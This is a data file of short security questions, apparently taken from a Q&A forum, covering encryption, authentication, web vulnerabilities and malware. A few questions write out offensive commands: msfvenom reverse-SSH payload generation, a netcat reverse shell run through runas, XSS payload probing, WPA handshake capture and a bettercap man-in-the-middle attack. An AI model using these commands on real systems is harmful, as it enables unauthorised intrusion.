instruction
stringlengths
24
29.9k
For regular traffic in mesh network (between Internet of Thing devices) customer decided to use one of two options: DTLS PSK ciphersuite - DTLS based on pre-shared symmetric key or direct use of AES - customer wants to minimize traffic between sleepy devices (battery should be alive for several months) Questions: Wh...
I found a client-server application where the server creates a random AES-256-CBC key, and gives this key to the client for use as an authentication token. The key is used on the server to encrypt a string describing the user's privilege level, for which the ciphertext is stored on the server in a file that cannot be a...
I've been trying to trigger xss in a website with the following url https://website.com/login/error?username_or_email=xyz%40gmai.com&redirect_after_login=%2wall While trying different payloads with Burp Intruder, I noticed that various payloads returned HTTP 500 server error and 400 bad request. HTTP/1.1 400 Bad Requ...
I'm new here to ask a question. Sorry if my question had miss explanation. I just wanna ask if my PHP code is secure enough. Please find below is the source code: Get the ID for choosing the Value /*Create a new Query for get all the ID from each of Venue Type on the Administration Database*/ $Q_VenueType = "SELECT...
I was learning about XSS and found a website that takes my input say PAYLOAD and converts it to <a href = "example.com/search/PAYLOAD" > Link </a> After hit and trial, I found that it HTML encodes ", ', < and > . Is there a way for me to implement alert(1) here?
I'm trying to solve @kinugawamasato xss challenge https://vulnerabledoma.in/xss_2020-06/ It's a php script that receives a argument, escapes it and create he following tag on the html: <script src="/xss_2020-06/check_code.php?callback=callback&amp;code=PARAM"></script> So PARAM is the argument. The maximum payload is ...
I am playing around with disk encryption. https://gitlab.com/cryptsetup/cryptsetup/-/wikis/DMCrypt#iv-generators says: essiv: "encrypted sector|salt initial vector", the sector number is encrypted with the bulk cipher using a salt as key. The salt is derived from the bulk cipher's key via hashing. Note that while th...
How can you tell the available output formats for a given payload in msfvenom? For example: this wont work: msfvenom -p cmd/unix/reverse_ssh LHOST=[ip] LPORT=4444 -f elf > out.elf but this will: msfvenom -p cmd/unix/reverse_ssh LHOST=[ip] LPORT=4444 -f raw > out.sh and --list formats just shows every format in msfven...
Many websites ask for payment by entering information from Credit card such as VISA card/ Mastercard etc. Now, till date I knew that I should never tell anybody about these numbers. Then why these websites ask for credit card details and if (suppose) any of them have a malicious intent, then what can they do with thes...
There are various modes of online transaction, such as through entering credit card details, and through netbanking. Which one is safer? it seems there are some risks with credit card mode mode but is netbanking safer than that? I seacrched the google but I didn't find the answer.
I have a few PGP keys from long ago that I no longer use. I thought I had revoked them everywhere I had uploaded them but I just noticed I missed one keyserver. Unfortunately, I only have access to the revocation certificate for one of them. Is there a way to transfer the revocation from another keyserver to the one I ...
I like to invest money online. I invest in both cryptocurrencies as well as regular stocks. As my bankroll grows (let's say 20k+ in the near future), I feel like I need to start taking more serious security measures. My idea is to buy a cheap smartphone (~100$), and use this as a dedicated device. I either directly go...
A bank where I have an auto loan has a credit reporting feature. The feature shows that I have several "Dark Web Alerts" for "Compromised Email Address". The alerts list the breached sites, for example schmevite.com and schmafepress.com (and others). This doesn't make sense. How was my email address breached at a websi...
I had forgotten to log out of my personal T-Mobile web account on my computer at work today. When I came home, I remembered, so I logged on to my account at home (different computer, different network, of course, from work), and changed my passwords, pin-codes, as well as security questions. In addition, I have 2FA on....
Why do most websites use the pair of username and password as we can just use a long password like a token to identify a user? A simple example: On the server, we create a JSON file with user data inside of it (email, role etc.) and give it a random 32-characters name. Then if a user wants to log in, he just copy/paste...
SCENARIO: A web page shows an error login page using these javascript lines <script> let queryParams = new URLSearchParams(window.location.search); document.getElementById("message").innerText = queryParams.get("message"); let link = document.getElementById("link"); link.innerText = queryParams.get("lin...
Is it possibly to test if an Ed25519 public key is valid without having access to the private key, a signed message or anything except the public key? "Valid" as in "Not just 32 random bytes". I'm assuming not every random combination of bits would be possible to generate as a public key.
I know that PHP used the system implementation for its rand() function, which is usually a weak LCG or LFSR implementation. Did this change? In case it still does, I am using Fedora 32. PHP states in its documentation that rand() does not create cryptographically secure values. I've written a small script, that creates...
Is there any reason to show a Content-Security-Policy (CSP) HTTP Header for direct links to images such as https://invalid.tld/direct-link-to-image.jpeg?
If the database has a built in encryption possible such as Azure SQL Server's, Transparent Data Encryption (TDE) would this be enough for getting the HIPAA compliance ? Or even before storing any data that could be PHI like dates, names has to be encrypted and then written to database ?
If one is creating pseudo-random base 62 url paths, and one didn't want those paths to be reasonably vulnerable to brute force attack. How short could they be? Reasoning Now one could have expiring short urls and urls expecting to be read from a particular device key, and many other measures. Also I'm sure there are ...
An in-house team is creating a new framework and I'm not so sure it's as secure as they're letting on. I'm not super well versed in security so I wanted to ask for opinions. A demo web app was created for us to get familiar with the layout. I don't have access to the source code yet, however when I viewed the network r...
I've seen scenarios in which organizations don't invest enough in cybersecurity, are short-handed, and thus have a difficult time meeting the policy requirements defined within their Security Programs. I would assume that many companies don't properly invest in cybersecurity and that this scenario is fairly common. My ...
Today I brought my personal laptop to the office. My laptop connects to the personnel wi-fi automatically (not actual intranet). To mention, my work ID and password are needed to connect this network. I was working on Google Chrome and i wanted to look at something that is not work related, so i opened Opera Browser. A...
There are two ways I can think of doing this: On a system with sudo, by modifying /etc/sudoers. On a system without sudo (such as a Docker environment), by writing a program similar to the below and setting the setuid bit with chmod u+s. apt-get checks real uid, so a setuid call is necessary. ... int main(int argc, c...
Consider this common example used to demonstrate timing attacks: async def sign_in(username, password): user = await get_user_from_db(username) if user is None: return False # early return :( password_hash = slow_hash(password) return verify(password_hash, user.password_hash) The usual suggestion is to d...
I understand SSL/TLS is the most commonly data transmission protocol for a secured communication. I need to implement the same in one of the IoT device (ARM® Cortex®-M4 Core at 80 MHz). This will be TLS Client implementation. Since the device is a small scale device, I am looking for a light weight SSL Library (bearSS...
Just glancing at GCP offerings for storing data, I noticed that while using Firestore, the only control for restricting public access is via security rules. However, in case of mis-configuration of security rules or compromise on access tokens/keys the data store becomes absolutely public available at: https://firestor...
Scenario: Vendor 1 needs to upload data (.json, compressed .csv files, images and video) to an Azure blob storage container owned by Vendor 2 Vendor 1 is issued a limited duration SAS token each day to use Azure does no scanning of incoming blobs (therefore content is untrusted when it lands) Microsoft recommends pr...
Like any other website owner, I get frequent probes for vulnerabilities e.g. .php .sql or .gz pages. These used to appear in my log files as 404 responses (we host on ASP.NET Core). These also take up server time and processing as it has to handle the request in the pipeline check the static files for a match check t...
Yubico offers the YubiKey Nano, a 2FA key designed to be left inside the device more or less permanently. While it does add comfort to be able to just leave it plugged in, what risks would there be if the device was stolen with this still attached? From what I could gather, local device accounts would have the same l...
TAXII feeds are a great addition to a monitoring solution such as a SIEM. However, to my knowledge, there are only three distinct openly available providers: Hail A TAXII OTX Limo What other threat feeds based on TAXII/STIX are available?
I am a business owner with a strong technical background, say a programmer, though not an advanced system administrator. I've bought a VPS server where I want to host several applications and webpages. One of the apps consists of a back end, admin front end, and user front end. Another one is just back end and front en...
I am trying to understand how DNS-over-HTTPS (DoH) works in both Chrome and Firefox browsers. To do so, I have enabled DoH on each browser and set the DNS provider to Cloudflare DNS servers (1.1.1.1 and 1.0.0.1), at both browser and operating system level (Windows 10 in my case). However, the traffic captured by Wiresh...
I have recently started using Cloudflare's firewall in front of a web application. This app has a limited user base of selected applicants and they must log in to view anything. There is no public registration form and nothing within the portal can be accessed without an account. Since moving the DNS to Cloudflare I ca...
BurpSuite marked a website I am testing with having a potential LDAP injection vulnerability. It seems that when I put an asterisk in a parameter ex. getStuff?id=* I get a 500 error and Java error output. When I set it to something normal like 123 I get a 200 response (the page is just blank however). I'm not sure how ...
I am in the process of developing a web-application which requires MFA on every login. (On the first login, before you can do anything, you are forced to setup MFA. Due to monetary restrictions and development time restraints, the MFA chosen is a simple TOTP solution, but in the future I may include other providers suc...
My understanding is if I delete photo001.jpg, this deletes the index and assigns it to the free space to be overwritten. So this brings me onto my next scenarios. If I have a device capable of 8gb memory, and it has been filled to its capacity, is it likely that photo001.jpg has been overwritten if deleted say a month ...
I've been dealing with this Chrome malware for awhile now, and I can't identify where it's coming from. Very occasionally, when I click on a top link in Google, it'll redirect me to a site that looks like this (always the same green circle with the text "Loading"), and then to adware. The redirect is located at a new d...
With nmap you can see a live system's or server's open, closed, and filtered ports. But how do you make it show as filtered when it is currently shown as open?
It's been a few years since I've played around with this so I'm not sure if times have changed. When using AR7921 chipset (Alfa AWUS036NHA) on Ubuntu 20.04 I can see many networks using the following commands airodump-ng start wlx00c0ca84d0f8 airodump-ng mon0 I've noticed all the VMxxxxx networks have a very low beac...
Imagine I have the research papers on designing COVID-19, the cure and some nuke launch codes on my laptop and want to often communicate those to another computer at my home. I already installed a physically separate STP cable network. Now what? My previous experiment in the field resulted in the conclusion that un-upd...
From reading around on the internet I get the impression that barring physical damage, deleted data can be always be recovered using sophisticated digital forensics. For this reason the advice is that you should encrypt your data. So at what point is data irrecoverable even to sophisticated digital forensics?
I decided to use my personal Macbook at work, so I'll be using my employer's network connection. But I'm really concerned about my privacy. I know I can do non-work stuff using Tor Browser or Brave's Private window with Tor, but what about my reminders, notes, voice memos and other Apple's built in apps? I am really fr...
Our company has rolled out MFA to our users. We are a Microsoft shop, so we are using Azure AD to handle MFA and authentication to things like email, Teams, Sharepoint, etc. By default, we've disabled MFA prompts when users are on our company network. But of course, since almost everyone is working remotely right now, ...
It is a common method on mobile applications to allow users to bypass authentication process by verifying a locally stored token (previously authenticated) on device. This is to strike a balance between usability (avoiding authentication every time) and security. Are there any security holes in this process? What are ...
I have an old project which parses XML files coming from an external origin, so it is at least in principle vulnerable to XXE. It is difficult to update the project to use newer versions of XML libraries, which can be configured to prevent XXE from happening. So I am looking instead for a "manual" solution; since XML f...
I got call from revenue and asked them confirmation that's it's call actually from them. They sent me email (I check Gmail original and it's actually from revenu) with securedoc.html I need to open this attachment to read secure message. But I'm not sure if it's secure to open html from your local drive. I read the the...
So just 30 minutes ago, I was looking through some emails that ended up in my scam, and as usual there are amazon emails with recommendations based on past purchases and stuff like that. Then there is these new email asking that if I were to upload a photo to Amazon Photos I may be eligible for $10 in amazon credit. So...
My wife inadvertently clicked on a flash player update and suddenly my chrome browser displays that it is being managed by an Organisation. I tried deleting chrome and reinstalling it but nothing changed. Could this be a malicious attempt to hijack my browser?
First off let me say I'm fully aware this question can only be answered by the token vendor but I have already contacted them and with the whole COVID situation my hopes of hearing from them soon are not high (nor that I need to, this is just to satisfy my own curiosity). What I'm hoping to get as an answer is maybe so...
My mother recently had her Amazon account (buyer, not seller) hacked. She is not a security expert but does work in database management, so she is definitely not computer illiterate. I am also not a security expert but I work as a software engineer, and still this situation is strange to me. She asked me for advice and...
I am currently investigating a mobile app API. There is a feature which fills in a form in the app automatically. The user supplies a string which contains all the compressed form data. And then the app displays the filled in form for the user to enter some additional mandatory data, and submit. It does all of that wit...
I'm developing a TCP Streaming API for "IoT" devices in LabView. The TCP Server will be listening to a certain port, and our devices will try to connect to it. In order to know that the connecting client is from our company, all our servers and clients will share a private key and a password. When the client connects s...
A lot of users on older devices or IoT devices that don't or can't get updates will encounter problems in the coming year or two because a lot of the original long-lasting CA root certificates will expire. Because this is a very technical problem that most people will be totally unaware of and probably won't understan...
Currently running a vulnerability assessment. However, the IP I was provided is a load balancer and the client only wants to test one of the sites running on the load balancer. The vulnerabilities I have found are all PHP related. How can I confirm that their website is running that PHP version rather than another webs...
You can see that the two fingerprints differ, the second(nThbg6...) is the legit that can be found here: https://help.github.com/en/github/authenticating-to-github/githubs-ssh-key-fingerprints I couldn't find anything about the first(PcziX...) So, what changed between attempt 1 and 2? Attempt 1: I setup an old router y...
I have troubles to understand what is exactly a threat. If I've an antivirus able to catch some malware, is this malware still considered a threat to my computer.
the hash is a lot of numbers separated by hyphens, something like that 02-35-161-51-43-227-161-06-151-43-22-71-43-46-21.... More than 700 numbers.
I need to look for something on deep web but having macbook air, I feel that it could be rooted from apple / reseller - my idea is that there is some chip logging every key stroke and then send it when it can - am I overly paranoid or am I having a good sense of how things now works? do you believe apple to produce key...
I was wondering if it is possible to create some sort of database that is physically impossible to enter. While creating it, you store some information in it and program it to spit that information after a period of time. But not even you can access it even if you wanted to, you have no choice but to wait.
This is something I've wondered for a while - is it theoretically possible to track someone using their phone number in the UK? It's a classic Hollywood trope and I'm wondering just how much truth there is to it and how feasible it would be. Doing some basic research returns plenty of services and apps that claim to b...
Some companies install software on corporate VPNs which also come with a root certificate installed on all employees' machines. This allows for encrypted traffic to be decrypted by technology installed on the VPN. Some companies even have to do this to meet certain auditing and compliance requirements. Is it possible f...
A trusted execution environment (TEE) provides a way for one to deploy tamper-proof programs on a device. The most prominent example of TEEs seem to be Intel SGX for PCs. What I wonder is, if there exists an equivalent solution for mobile devices. For example, I want to deploy an arbitrary application on a smartphone t...
I am not able capture 4 way handshake, I also tried manually disconnecting and reconnecting my device to the network in hope that airodump-ng will capture the handshake but no luck. I checked the device was successfully getting disconnected after sending deauthentication packets, and gets automatically reconnected the ...
I am new to SQL injections, and people on Reddit asked me do the portswigger labs. Which I did up till before 2nd order ones. So I am pretty comfortable with usual SQL injections. Now I have myself made a PHP website using mysqli extensions instead of mysql. So for example, a basic Query execution looks like: //mysqli...
I'm currently working on a project where I'm trying to send data to a 3rd party service that utilizes two-way SSL. My current setup includes a few servers that will each send data to the service. Each server has a unique address and no associated hostname. Since I have multiple servers with different addresses, will I...
Is there a standard format for storing/exchanging encrypted data along with the key needed to decrypt it (data is encrypted with a single use symmetric key and the symmetric key itself is encrypted with asymmetric key for the receiver)? We are trying to build an interoperable protocol to exchange large messages between...
Is there a standard format for storing/exchanging encrypted data along with the key needed to decrypt it (data is encrypted with a single use symmetric key and the symmetric key itself is encrypted with asymmetric key for the receiver)? We are trying to build an interoperable protocol to exchange large messages between...
The FBI recently used a 0day exploit to hack a TAILS user and expose their real IP. I am interested in how they could have managed to obtain the user's real public IP after compromising the machine. Since TAILS sends ALL network communications over tor, simply having the computer report to a server controlled by the FB...
The question is about voting in decentralized systems. Quadratic voting is a wonderful way to reach consensus without arranging property qualifications. However, quadratic voting requires a KYC: otherwise, the attacker will simply distribute his funds to many accounts and get many votes, bypassing the quadratic increas...
I'm building a part of a site where users can embed Youtube videos into their profile. I'm planning to have them get the embed iframe from Youtube directly, and submit that to our server. We're then responsible for rendering it. For completeness, a typical such iframe would look like this: <iframe width="560" height="3...
I have a free infinityfree.net web server that was vulnerable to CVE-2017-12419 for quite a big window of time. After fixing the gap and changing the passwords, what are some ways to detect if the server has been intruded? Is it true that the vulnerability only allows read-access? Can audit logs still be trusted?
What is the difference in anti malware like malwarebytes premium and an anti virus? Do I need both or would malwarebytes be enough?
The air-gap system in question is a cryptocurrency vault system that is responsible for generating addresses and signing transactions while it keeps the sensitive information air-gapped. [ Vault app ] <====[QR]====> [ Wallet app] Data to protect: Private keys and similar sensitive string values stored in memory, on a...
I am a designer. I have received several emails offering jobs. There is a link. I never click to links in emails. I look at the sender address and look at google to see if it could exist a real firm with that name. Most of the time I see no company. So, I assume they are malicious emails. Is that the way to deal with t...
I am using bettercap command line to perform a Man in the Middle attack on my LAN network with an EDUCATIONAL purpose (of course!). I want to intercept the TCP traffic, with the intention to view on my terminal the TLS certificate,public key etc. When I want to enable the TCP proxy by typing: bettercap -T [ip addr of ...
I am asked to prepare a write up on Identity Federation. I have nearly completed the write up. There is a term multi-party federation which I am confuesed at. Does it simply mean alloting multiple parties to carry out federation? Or is it a term that requires more research? I couldn't see much articles in Google. A Goo...
Do border agents have the master key to Bitlocker? A few years ago a Canadian border officer told me my computer with BitLocker could be deciphered by a Canadian security agency. Since this is Microsoft's flagship security product, his statement worries me.
For some reason - totally useless for the question - I have this PDF file with a password I forgot and I have no way to remember. I know for a fact (the person who created and gave me this PDF told me so) that the password starts with "AAbcDef", has some other characters but I don't know how many. It also has a '2' aft...
When auditing a machine for one of my clients I noticed that they have PostgreSQL listening and accessible from public network. This is not necessary for their application, seems they simply neglected to set up the firewall properly. PostgreSQL seems to be running default pg_hba.conf file from the distribution package,...
try ping these (and everything in between) 021111111111 021555555555 What are they?
For some context, I want my api to be able to 'impersonate' (or connect as) a user on my ldap database as most of the api's access controls are on the ldap database and tied to the user you are connected as. In order to do this I have an idea where I will generate a random password for each user. The random password wi...
My antivirus has been constantly detecting threats and It's always temp files. Everyday I open a programme or use/inject a dll and it detects a Gen:Variant.Application.HackTool.180 or Tojan.GenericKD.33997631. I scanned with Malwarebytes, CCleaner, Tdsskiller, RogueKiller, ESET and others, today. The scans have only de...
I use USB tethering on an Android 10 mobile to access internet on my laptop. I use Tor browser (TB) on laptop and keep my OS (a Linux distro) on laptop patched for security vulnerabilities. At times I need to consume certain content from websites which I don't want any intermediary to know about. Can my mobile device s...
I have a quick question regarding parameters for HSM based symmetric Key Derivation. My situation is that I have to implement HSM based symmetric key derivation for encryption of sensitive data to be stored inside DB. Each data entry should have distinct AES-256 key used only for that records encryption. There are two ...
I understand that re-using a key without a unique IV is a deadly sin, but what if there‘s the guarantee that the key is only used for encrypting and decrypting one dataset? I was thinking about generating a longer random sequence, splitting it up in two parts, using one part as the key and the other as the IV. But does...
Many thoughts have been spent on creating the decentralised, minimum-knowledge contact tracing approach DP-3T. This has been implemented in contact tracing apps of several countries, e. g. the German Corona-Warn-App. Following this approach, there is no central instance that can identify users' contact history. However...
I had a problem with my VPN Service, and I asked a guy in a forum for help, and he told me to screenshot all of my settings in my VPN application. Is this safe, if not, what setting should I redact? Is there something I need to hide from others, and is it safe to say what VPN service I use ?
I understand there are techniques to prevent someone from spoofing your domain in emails. Is there any guarantee or check that the receiver can do to ensure the sender is authentic? Gmail shows TLS and signature information, is that sufficient to guarantee the authenticity of the sender when present?
I know that PKCS#12 files can contain multiple certificates and private keys. However, I could not find any resource where any limit was mentioned for the number of certificate chains or private keys that could be contained. Is there a max limit of certificate chains that can be present in a PKCS#12 file? I assumed tha...
We have a Laravel 5.6.x application running as a REST backend with PHP 7 on one of our servers. The server uses CentOS with WHM/cPanel/PhpMyAdmin Recently that server issued a maldet warning (our malware detector) after it saw some strange PHP files appear in the /public folder of the Laravel application. Upon reviewin...
Google Domains' DNS management has a link that says Enable DNSSEC. And, as I understand it, this prevents spoofing of DNS responses. And, that sounds great! So, why wouldn't I want to enable DNSSEC? Does it prevent me from using local overrides (/etc/hosts) for testing? Does it prevent older clients from performing DN...
Server side : I have created the secure SSL server using openssl command with no certificate to verify using cipher suite PSK-NULL-SHA256 with preshared key "AD" with dummy key and PSK identity as given below which results in server is created and waiting for client to connect with. openssl.exe s_server -accept 4020 -...
Using Javascript, say a customer buy a product that cost 10$. Many payment gateways, like PayPal and Stripe, offer a client side Form where you input the sale data (price, amount, buyer address, etc), and it's being sent to the gateway (e.g PayPal) from the client side. But, at this point when i fill the form using Jav...
My trusted root certificates are below. As an exercise, I want to be sure that a MITM is not changing the list. So, can I somehow get this list signed? In my opinion, the list could be signed by my laptop's TPM using a key signed by my laptop's manufacturer, HP. The final verification process is then: copy these 3 it...
Earlier today, my mother opened an email thinking it was from my sister-inlaw, then clicked on the shortened link. The link loaded a page of fairly nonsensical text. The source of the page had no explicit javascript code, but the text was formatted with a non-standard identifier. NoScript told me there were scripts on ...
QBot is a banking trojan that's over 12 years old. Recently it received some updates as documented by F5 labs here: https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks What I'm confused about is what they mean when they list the 40+ banks that it targets. They even includ...
I'm reading up on how to perform signed updates for remote hardware devices. I need to check if the new software has been generated by a "trusted" source, ie me. Based on my understanding of asymmetric cryptography I understand that I can embed a public key on all my devices and then any new software that needs to be u...
I am learning Windows Privilege escalation. I've managed to add a user to the Administrators group but I don't know how to execute nc.exe, present in the Temp dir, with elevated privileges. I am running runas /user:tcm-pc\administrator nc.exe -e cmd <ip> <port>; however, it asks for an administrator password, which I d...